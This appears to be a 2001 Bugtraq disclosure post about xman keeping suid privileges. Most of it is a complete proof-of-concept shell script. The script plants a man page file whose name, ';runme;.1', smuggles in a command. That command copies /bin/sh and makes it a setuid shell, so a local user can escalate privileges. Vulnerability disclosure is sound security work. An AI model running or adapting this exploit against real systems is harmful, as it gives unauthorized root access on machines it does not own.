xman doesn't drop privileges anywhere in the program. but, does support suid installation. so, exploiting via a system call is much easier than the buffer overflow in MANPATH, mentioned in another bugtraq posting. here is an example of such an exploitation possibility:

-- xxman.sh --
#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> v9at_private -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest
-- xxman.sh --

Vade79 -> v9at_private -> realhalo.org.
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 14:54:48 PDT